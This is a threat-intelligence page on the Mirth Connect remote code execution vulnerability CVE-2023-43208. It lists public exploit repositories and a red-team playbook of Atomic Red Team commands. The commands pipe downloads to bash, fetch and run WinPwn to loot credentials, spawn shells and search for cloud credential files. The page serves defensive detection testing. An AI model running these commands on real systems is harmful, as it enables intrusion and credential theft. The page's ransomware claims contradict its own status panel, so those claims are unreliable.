CVE-2023-43208

CRITICAL CISA KEV EXPLOIT POC TTE Zero-Day Pub 26/10 Upd 21/10

Overview

This vulnerability is a remote code execution flaw resulting from improper input validation in NextGen Healthcare Mirth Connect versions prior to 4.4.1. The root cause is an incomplete patch addressing a prior vulnerability, allowing injection of operating system commands via crafted HTTP requests. The affected component is the server API endpoints that process user-supplied data without adequate sanitization, enabling execution of arbitrary system commands.

Vulnerability Description

NextGen Healthcare Mirth Connect before version 4.4.1 is vulnerable to unauthenticated remote code execution. Note that this vulnerability is caused by the incomplete patch of CVE-2023-37679.

Impact

An unauthenticated attacker can execute arbitrary system commands on the vulnerable server, potentially gaining full control over the host environment. This enables unauthorized access to sensitive data, manipulation of system processes, and lateral movement within the network. No user interaction or credentials are required, making exploitation straightforward and allowing attackers to compromise the confidentiality, integrity, and availability of the affected system.

Solution

Upgrade NextGen Healthcare Mirth Connect to version 4.4.1 or later, where the incomplete patch has been fully applied to remediate this vulnerability. Refer to the vendor's official advisory and patch notes for detailed instructions. Additional mitigation includes monitoring and restricting access to the exposed API endpoints until the update is applied. Relevant references include the Horizon3 advisory and Packet Storm Security report for patch verification and implementation guidance.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

The vulnerability affecting NextGen Healthcare's Mirth Connect prior to version 4.4.1 is characterized by a critical flaw that allows unauthenticated remote code execution. This issue arises from an incomplete patch of a previously identified vulnerability, indicating a failure in the remediation process. Specifically, the flaw resides in the way the application handles certain requests, allowing an attacker to execute arbitrary code on the server without needing any authentication. This can lead to severe consequences, as the attacker can manipulate the system, access sensitive data, or disrupt services.

Attack vectors for this vulnerability are particularly concerning due to the ease with which they can be exploited. An attacker could leverage the flaw by sending specially crafted requests to the Mirth Connect server. Given that the vulnerability allows for unauthenticated access, even individuals with minimal technical skills could potentially exploit it. Scenarios could include deploying malware, exfiltrating sensitive patient data, or even taking control of the entire server infrastructure. The ability to execute arbitrary code remotely opens the door to a wide range of malicious activities, making this vulnerability a prime target for cybercriminals.

The real-world impact of this vulnerability is significant, particularly for healthcare organizations that rely on Mirth Connect for data integration and interoperability. The healthcare sector is already a prime target for cyberattacks due to the sensitive nature of the data involved. A successful exploitation could lead to data breaches, regulatory penalties, and loss of patient trust. Additionally, the operational disruption caused by such an attack could result in financial losses and damage to the organization's reputation. The potential for widespread impact is amplified by the interconnected nature of healthcare systems, where a breach in one system can have cascading effects across multiple platforms.

To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating software to the latest versions is crucial, as this vulnerability has been addressed in subsequent releases. Organizations should also conduct thorough vulnerability assessments and penetration testing to identify and remediate weaknesses in their systems. Intrusion detection systems can be employed to monitor for unusual activity that may indicate an attempted exploitation. Furthermore, implementing strict access controls and network segmentation can help limit the potential impact of an attack, ensuring that even if a breach occurs, the attacker’s ability to move laterally within the network is restricted.

In conclusion, the vulnerability in Mirth Connect represents a serious threat to healthcare organizations, with the potential for significant operational and reputational damage. The ease of exploitation and the critical nature of the systems involved necessitate immediate attention from cybersecurity professionals. By adopting proactive detection and mitigation strategies, organizations can protect themselves against this and similar vulnerabilities, ensuring the integrity and confidentiality of sensitive healthcare data. As the threat landscape continues to evolve, maintaining vigilance and prioritizing cybersecurity will be essential for safeguarding against emerging risks.




CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2023-43208, reflecting a modest rise in attempts to exploit this critical unauthenticated remote code execution vulnerability in NextGen Healthcare Mirth Connect. This uptick, while not rapid or widespread, signals persistent adversary interest, likely driven by the availability of multiple proof-of-concept exploits circulating publicly. The continued presence of ransomware groups leveraging this vulnerability underscores its operational relevance in the threat landscape. Although the overall exploit trend remains stable, the incremental increase in detection events suggests that threat actors are maintaining or slightly intensifying their targeting efforts. Consequently, this development reinforces the criticality of timely patching and monitoring, as the vulnerability remains a high-risk vector for compromise in healthcare environments.



Update 2 — July 03, 2026

CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2023-43208, reflecting a sustained and slightly intensified exploitation effort by threat actors. This increase coincides with the continued public availability of multiple proof-of-concept exploits, which have facilitated broader adversary engagement, including ransomware groups known to leverage this vulnerability for initial access and lateral movement. Although the overall exploit trend remains stable according to EPSS metrics, our telemetry indicates a sharper rise in targeting attempts, underscoring an elevated operational tempo. This development heightens the urgency for defenders to maintain vigilant monitoring and reinforces the critical nature of this vulnerability as a persistent high-risk vector within healthcare environments. The evolving exploitation landscape suggests that threat actors are capitalizing on the incomplete patching legacy of CVE-2023-37679, sustaining CVE-2023-43208’s relevance in active campaigns.



Update 3 — July 11, 2026

CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2023-43208, reflecting a modest rise in adversary activity despite stable EPSS scoring. This uptick coincides with the continued availability of multiple proof-of-concept exploits circulating publicly, which lowers the barrier for threat actors to weaponize this vulnerability. The persistence of ransomware groups leveraging this flaw underscores its ongoing operational value in intrusion campaigns. Although the overall risk profile remains critical due to the vulnerability’s unauthenticated remote code execution capability and incomplete prior patching, the incremental rise in targeting activity signals a need for heightened vigilance. Defenders should interpret this development as an indication that adversaries are actively refining and expanding exploitation efforts, sustaining pressure on healthcare environments reliant on vulnerable versions of Mirth Connect.



Update 4 — July 20, 2026

CSURFACE threat intelligence has identified a slight increase in exploitation attempts targeting CVE-2023-43208, accompanied by the emergence of additional publicly available proof-of-concept exploits. This uptick in activity, while moderate, signals sustained adversary interest in leveraging the incomplete patching of Mirth Connect versions prior to 4.4.1. Our telemetry indicates that ransomware groups continue to incorporate this vulnerability into their operational toolkits, maintaining pressure on healthcare organizations that have yet to fully remediate affected systems. Although the overall exploit trend remains stable, the proliferation of new exploit code lowers the barrier for less sophisticated actors to attempt compromise, potentially broadening the threat landscape. Consequently, the risk level remains critical, with an increased likelihood of opportunistic exploitation attempts that could lead to significant operational disruption and data compromise within vulnerable environments.



Update 5 — August 04, 2026

CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2023-43208, reflected in a significant uptick in detection activity across our sensors. This surge coincides with the emergence of multiple new proof-of-concept exploits publicly available on code-sharing platforms, which lower the technical barrier for adversaries to weaponize this vulnerability. The continued association of this flaw with ransomware actors further amplifies its operational risk, as these groups increasingly integrate the exploit into their attack chains. Although the overall exploit trend remains stable according to EPSS metrics, the qualitative increase in telemetry suggests a widening of the threat actor base and a heightened likelihood of opportunistic attacks against unpatched NextGen Healthcare Mirth Connect deployments. Consequently, the threat level remains critical, with defenders facing increased pressure to detect and mitigate exploitation attempts amid a more accessible and active exploit landscape.

Affected Products (1)

Vendor Product Version CPE
nextgen Nextgen Mirth Connect All cpe:2.3:a:nextgen:mirth_connect:*:*:*:*:*:*:*:*
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

Metasploit (1)

Module Authors Rank Platform Link
Mirth Connect Deserialization RCE
exploits/multi/http/mirth_connect_cve_2023_43208
r00t, Naveen Sunkavally, Spencer McIntyre Unknown unix, linux View

GitHub PoCs (15)

Repository Author Stars Forks Date Link
K3ysTr0K3R/CVE-2023-43208-EXPLOIT
A PoC exploit for CVE-2023-43208 - Mirth Connect Remote Code Execution (RCE)
K3ysTr0K3R 29 11 2024-03-15 View
predyy/CVE-2023-43208
PoC for CVE-2023-43208 RCE exploitation.
predyy 9 0 2026-02-25 View
jakabakos/CVE-2023-43208-mirth-connect-rce-poc
jakabakos 7 2 2024-03-17 View
kyakei/CVE-2023-43208
CVE-2023-43208: Mirth Connect Pre-Auth RCE PoC
kyakei 3 1 2026-02-22 View
MKIRAHMET/PoC-2023-43208
A proof-of-concept exploit for CVE-2023-43208, a remote code execution vulnerability in Mirth Connect before version 4.4...
MKIRAHMET 3 0 2026-02-24 View
Avento/CVE-2023-43208_Detection_PoC
Use java.net.InetAddress for detection
Avento 2 0 2024-11-28 View
az4rvs/Mirth-Connect-CVE-2023-43208
Python implementation of CVE-2023-43208 Mirth Connect RCE (Unauth XStream)
az4rvs 2 0 2026-02-26 View
Pegasus0xx/CVE-2023-43208
PoC for Mirth Connect Remote Code Execution (RCE)
Pegasus0xx 1 0 2026-02-22 View
Criz117/CVE-2023-43208-PoC
Proof‑of‑concept Python script demonstrating CVE‑2023‑43208 in Mirth Connect, allowing version checks and command execut...
Criz117 1 0 2026-03-13 View
4nuxd/CVE-2023-43208
A PoC exploit for CVE-2023-43208 - Mirth Connect Remote Code Execution (RCE)
4nuxd 0 1 2026-03-12 View
ledksv/Interpreter-HackTheBox
Writeup for Interpreter — HackTheBox Medium Linux box. CVE-2023-43208 Mirth Connect RCE, PBKDF2 hash cracking, Python ev...
ledksv 0 0 2026-05-05 View
J4F9S5D2Q7/CVE-2023-43208-MIRTHCONNECT
J4F9S5D2Q7 0 0 2024-06-09 View
D3m0nicw0lf/CVE-2023-43208
mirth-connect-rce-poc
D3m0nicw0lf 0 0 2026-02-25 View
LunaLynx12/cve-2023-43208-poc
LunaLynx12 0 0 2026-03-12 View
Humberto-pixel/CVE-2023-43208-PoC
Explota vulnerabilidad
Humberto-pixel 0 0 2026-03-28 View
Exploited in Wild CONFIRMED
Ransomware NOT ASSOCIATED
Attacker Interest MEDIUM
Sightings Few sightings

Threat Feed

33 events
2026-08-28
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-27
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-25
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-16
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-15
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-06
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-05
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-03
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-02
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-01
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-31
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-29
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-28
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-27
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-15
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-12
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-11
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-07
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-06
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-02
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-29
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-03
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-29
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-24
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2024-05-20
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

2024-03-15
PoC Published (15 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

2023-10-25
Exploit Published (0 ExploitDB, 1 Metasploit)

Public exploit code is available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Deserialization Vulnerabilities
100% deserialization
OS Command Injection
100% command_injection
Remote Code Execution
100% rce
Code Injection
72% code_injection

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1059.004 Unix Shell Kill Chain execution ESXi, Linux, macOS, Network Devices
T1505.003 Web Shell Kill Chain persistence Linux, macOS, Network Devices, Windows
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1049 System Network Connections Discovery Kill Chain discovery Windows, IaaS, Linux, macOS, Network Devices, ESXi
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-6 Argument Injection
40%
High High
CAPEC-88 OS Command Injection
40%
High High
CAPEC-43 Exploiting Multiple Input Interpretation Layers
40%
Medium High

Red Team Playbook

44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1049 System Discovery using SharpView Windows PowerShell Privileged
Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
Command (PowerShell)
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
T1049 System Network Connections Discovery Windows CMD
Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Command (CMD)
netstat -ano
net use
net sessions 2>nul
T1049 System Network Connections Discovery FreeBSD, Linux & MacOS Linux, macOS Shell
Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
Command (Shell)
netstat
who -a
T1049 System Network Connections Discovery via PowerShell (Process Mapping) Windows PowerShell
Enumerate TCP connections and map to owning process names via PowerShell.
Command (PowerShell)
Get-NetTCPConnection | ForEach-Object {
  $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.ProcessName } else { $null }
  }
} | Sort-Object State,Process | Format-Table -AutoSize
T1049 System Network Connections Discovery via sockstat (Linux, FreeBSD) Linux Shell
Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
Command (Shell)
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
T1049 System Network Connections Discovery via ss or lsof (Linux/MacOS) Linux, macOS Bash
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
Command (Bash)
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
T1049 System Network Connections Discovery with PowerShell Windows PowerShell
Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
Command (PowerShell)
Get-NetTCPConnection
T1059.004 Change login shell Linux Bash Privileged
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
Command (Bash)
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
T1059.004 Command line scripts Linux Shell
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
Command (Shell)
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
T1059.004 Command-Line Interface Linux, macOS Shell
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
Command (Shell)
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
T1059.004 Create and Execute Bash Shell Script Linux, macOS Shell
Creates and executes a simple sh script.
Command (Shell)
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
T1059.004 Creating shell using cpan command Linux, macOS Shell
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/cpan/
Command (Shell)
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1  cpan
T1059.004 Current kernel information enumeration Linux Shell
An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
Command (Shell)
uname -srm
T1059.004 Detecting pipe-to-shell Linux Shell
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage...
Command (Shell)
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt      
T1059.004 Environment variable scripts Linux Shell
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
Command (Shell)
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
T1059.004 Harvest SUID executable files Linux Shell
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
Command (Shell)
chmod +x #{autosuid}
bash #{autosuid}
T1059.004 LinEnum tool execution Linux Shell
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
Command (Shell)
chmod +x #{linenum}
bash #{linenum}
T1059.004 New script file in the tmp directory Linux Shell
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which...
Command (Shell)
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
T1059.004 Obfuscated command line scripts Linux Shell
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to...
Command (Shell)
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
T1059.004 Shell Creation using awk command Linux, macOS Shell
In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command. Reference - https://gtfobins.github.io/gtfobins/awk/#shell
Command (Shell)
awk 'BEGIN {system("/bin/sh &")}'
T1059.004 Shell Creation using busybox command Linux Shell
BusyBox is a multi-call binary. A multi-call binary is an executable program that performs the same job as more than one utility program. It can be used to break out from restricted environments by spawning an interactive system shell. Reference -...
Command (Shell)
busybox sh &
T1059.004 What shell is running Linux Shell
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
Command (Shell)
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
T1059.004 What shells are available Linux Shell
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
Command (Shell)
cat /etc/shells 
T1059.004 emacs spawning an interactive system shell Linux, macOS Shell Privileged
emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
Command (Shell)
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
T1505.003 Web Shell Written to Disk Windows CMD
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
Command (CMD)
xcopy /I /Y "#{web_shells}" #{web_shell_path}
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (4)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2023-43208
horizon3.ai
GitHub CVE
https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/176920/Mirth-Connect-4.4.0-Remote-Command-Execution.html
cisa.gov
NVD API US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-43208